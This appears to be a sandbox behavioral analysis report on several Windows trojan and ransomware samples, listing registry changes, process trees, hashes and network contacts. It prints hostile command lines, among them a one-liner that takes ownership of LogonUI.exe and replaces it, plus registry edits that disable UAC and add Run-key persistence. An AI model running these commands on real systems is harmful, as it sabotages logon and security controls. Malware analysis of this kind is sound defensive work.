| File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\windows\WinAttr.gci | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe"
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe"
C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe
"C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\windows\SysWOW64\takeown.exe
"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
C:\windows\SysWOW64\icacls.exe
"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65© "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
C:\Windows\SysWOW64\takeown.exe
takeown /f LogonUI.exe
C:\Windows\SysWOW64\icacls.exe
icacls LogonUI.exe /granted "Admin":F
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "tobi0a0c.exe"
Network
| Country | Destination | Domain | Proto |
| US | 150.171.27.10:443 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 95.101.143.34:443 | tcp | |
| GB | 95.101.143.34:443 | tcp | |
| GB | 95.101.143.34:443 | tcp | |
| GB | 95.101.143.34:443 | tcp | |
| GB | 95.101.143.34:443 | tcp | |
| GB | 95.101.143.34:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs
| MD5 | a0679dce64fcf875f4208b823d4b85c0 |
| SHA1 | 85abe3673db82bfe5b2c207dc98648e32afffea0 |
| SHA256 | 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1 |
| SHA512 | 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6 |
C:\Users\Admin\Desktop\YOUDIED 5.txt
| MD5 | 05d30a59150a996af1258cdc6f388684 |
| SHA1 | c773b24888976c889284365dd0b584f003141f38 |
| SHA256 | c5e98b515636d1d7b2cd13326b70968b322469dbbe8c76fc7a84e236c1b579c9 |
| SHA512 | 2144cd74536bc663d6031d7c718db64fd246346750304a8ceef5b58cd135d6ea061c43c9150334ee292c7367ff4991b118080152b8ebc9c5630b6c5186872a3a |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
| MD5 | 74be3afd732dc010c8266326cc32127b |
| SHA1 | a91802c200f10c09ff9a0679c274bbe55ecb7b41 |
| SHA256 | 03fe34795ad0f91fc8eb8c9ebe8094541e4fb4d7095095f8b48f345c2a6d0f0c |
| SHA512 | 68fa03d640680e37614feccb56f4d41180724cb7c08ba25f9bea3830a44c03d635664d8e0255ab2d05d3613498f4a4dd4398b7971a2cb1c9ae3be93f944946e5 |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd
| MD5 | 288bebe9f904e6fabe4de67bd7897445 |
| SHA1 | 0587ce2d936600a9eb142c6197fe12a0c3e8472f |
| SHA256 | cf965fcc5a7ca4d9245c706c88b4d5013fb84be27b0ec262facccfadf14bdca2 |
| SHA512 | 7db8e7c1318bcab7cef2c02484a82f347a630443a644b546a5cc339a5a848d1a3e915255f9c357de6ee26817a55d1091d80e2a8e97f66afa5686b3d11ee56c3c |
memory/2508-221-0x0000000000400000-0x00000000004D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bg.bmp
| MD5 | a605dbeda4f89c1569dd46221c5e85b5 |
| SHA1 | 5f28ce1e1788a083552b9ac760e57d278467a1f9 |
| SHA256 | 77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e |
| SHA512 | e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610 |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe
| MD5 | c47c6a5111193af2c9337634b773d2d3 |
| SHA1 | 036604921b67bbad60c7823482e5e6cb268ded14 |
| SHA256 | 7c4f20624dd062a6c71d845d05c6328d5a903ca96398e2902506591b231ed585 |
| SHA512 | 56698b7b2edc0f94d0f7172c853cbe67ac682d132df768659ebca0c169091acb36ffd0a6874c26e2fb35117061c91c9eca4312532ba778312e3d63cc77ce1262 |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\mainbgtheme.wav
| MD5 | 1b185a156cfc1ddeff939bf62672516b |
| SHA1 | fd8b803400036f42c8d20ae491e2f1f040a1aed5 |
| SHA256 | e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36 |
| SHA512 | 41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7 |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe
| MD5 | 4151b988c9d5c550ccb6c3b49bf551d4 |
| SHA1 | 10ff979be4a5bbacaf208bdbb8236b940208eed1 |
| SHA256 | 5ec45cc1a109f556d0cd44ba48d3bf11af556ee66dd8b78c94d3ef0e93735e8e |
| SHA512 | c73947b534741c29340550066cd1a6b7cbb4387f3be8303f2d1d0cb21c6f430e0415c27daabc82d32570f421934db78dc840403de18aef09d5a4f0cbe4350e4d |
C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe
| MD5 | 219cd85d93a4ed65a481f353a3de5376 |
| SHA1 | a38ab77caf5417765d5595b2fcd859c6354bf079 |
| SHA256 | 00c9fdc8b877c7fb8365709155ab28cb3dac282ae7ec9fc9d47a78b408e0d13f |
| SHA512 | 367644e3bc3310207b5863b09688269c38a55540b8c87e71d66771c954d37d561ed09f3ee11b36c4c8f4a48b618b2e8debae3d93ff684d15305f93a3ade6b3d9 |
memory/5968-240-0x00000000009F0000-0x0000000000EF2000-memory.dmp
memory/5968-241-0x0000000005E90000-0x0000000006436000-memory.dmp
memory/5968-242-0x00000000059C0000-0x0000000005A52000-memory.dmp
memory/5968-243-0x0000000005E50000-0x0000000005E5A000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | b7443e89f0cb29d51ee6a257750e54d2 |
| SHA1 | 84127eebf275e781d5276af6fc4d09c5a6bfb7b9 |
| SHA256 | 8226877d6ab2e4834aea6bc71bd9865b28d0bd1ec2e8b4c23b8acf0301c56f26 |
| SHA512 | 446cfe25d82f3bbf7badd324cae691ad62e13bd7469e415f47b9141bddf30679219c672937f4f6768796c2936c3b9c557fabbda1fb51c5edbb7c1964bffa17be |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:19
Platform
win11-20241007-en
Max time kernel
300s
Max time network
230s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
11s
Max time network
14s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\425634766\3423304070.pri | C:\Windows\system32\LogonUI.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"
C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
"covid20.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
"HorrorBob2.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
"HorrorRansom 1.0 Final.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
"HorrorTrojan Ultimate Edition.exe"
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
"HorrorTrojan123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""
